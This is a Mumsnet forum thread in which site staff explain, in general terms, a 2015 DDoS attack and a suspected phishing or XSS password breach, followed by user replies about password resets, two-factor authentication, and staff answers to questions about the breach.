More about the Technical side of the attacks on Mumsnet

[JustineMumsnet]

Hi all,
There are have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began, proactively defending against them, minimising the impact of it and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kind of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on Open Web Application Security Project top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to either redirect the login process to their own site, to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the later. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it so we don't want to rush and end up creating bigger holes but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

It would be a good idea to have a web chat with MNHQ like they do with guests so we can ask all these questions and hopefully get some answers.

No, I didn't know that, Sim. Thanks. It's just infuriating to see this casual mistakes being made over & over again, absolutely everywhere. I've given up fuming about it - well, almost. Well, a bit ...

I have become the grumpy old woman muttering "People today wouldn't recognise diligence unless Starbucks sold it with chocolate sprinkles!" It's the 21st century equivalent of "They don't make 'em like they used to" ... which is also true.

these casual mistakes, obvs. I've been infected with the slapdash!

Garrick

Maybe it's a little like the saying in that old John Wayne movie - 'If you saw them, they weren't Apaches!'.

The really bad guys don't want to make a big song and dance about things; they'd much rather - if they found a genuine weakness - sit on it and exploit it further. (Which gives an interesting perspective on Jeffrey and his fan club.) Too many senior executives of large companies seem to think that if everything is going 'normally' with IT, then everything is fine. I generally assume the worst, though - it's a bit like when the kids go quiet. That's when you start to worry.

Yep, Sim, you are ABSOLUTELY RIGHT!!!!!!!

just popped back to see if there had finally been a decent response about our addresses etc.

and have carried on using ebay (with frequent password changes, just in case.)

Ebay and Paypal offer a variety of 2FA solutions, but I don't think their heart's really in it. They'll sell you a "security key" which is a Vasco (I think) one time password generator, or there's an app you can run which does the same thing (to the point of having a Vasco serial number), or you can have a code SMS'd to your phone. But it's all a bit hidden away and they never really explain why you might want to do this or what benefits it offers.

I can see you Binary.

How can I find out what password was posted with my username on that site? I last inputted it when I last changed username, and that was many months ago. Need to check it doesn't match anything else but hard to do without knowing what it was. If I change them all I will forget them. Too many new unique, strong passwords to change at once.

Ageing hippy - did you try Google?
This comes up

www.mumsnet.com/info/privacy-policy

It's a PITA, perhaps, but something you need to do bronya. Secure the relevant email(s) first and then work your way through the sites using each one's Forgotten Password routine if necessary. Once each account is secure, decide - at a little more leisute if you wish - if you want an account with the particular site and close accounts you don't need.

*leisure

I can't change my password here either. I can't find a forgotten password button!

They'll send a password reset email to your registered email, bronya, and you can use that. Go to beneath the orange 'Sign in with Google' and you should see a short para which has a link to click to have an email sent. Click that and follow the instructions.

Sorry - I was using the routine I use. I forgot that there's a slightly new one for users who have had their passwords zapped in the reset. Have a read of this. (It's also at the top of the page - it's got the link in it for the password change.)

I gave up and asked to delete my registration. Will just read for a while. Didn't post that much anyway. Hope it is all fixed soon!

Hope to see you back in due course then.

pip can you?

blimey maybe MNHQ are just blind then ;)

Huh, who said that?

If I'm invisible, I should use my super-power for Evil!

... I mean evil! whoops

I meant to say Evil!

...

i'm invisible too i guess.

We're here! So sorry folks, know you've got a lot of questions that need addressing. We're working our way through the thread, trying to get to the bottom of everything - please bear with us.

@00100001

Why is no-one fro HQ commenting on the questions

1. were you or were you not made aware of this breach in the middle if July

2. why, after the previous hack, was security not tightened?

3. why were admin passwords so very simple?

Hi 00100001

Sorry for the slow response; we're just getting back up to speed. In answer to your questions:

1. we weren't aware of the breach in mid-July; it was only after the DDoS attack and hacking in August that we found out about it.

2. had we known, we would of course have tightened security at the time, and informed all Mumsnet users about it

3. You’re quite right: admin passwords should have been better. Conversations have been had, and internal security of every kind has been tightened up. While it’s worth bearing in mind that the initial hacking wasn’t performed via forcing/guessing passwords, it’s nevertheless been a salutary reminder for everyone to prioritise security when it comes to passwords, both on MN and elsewhere.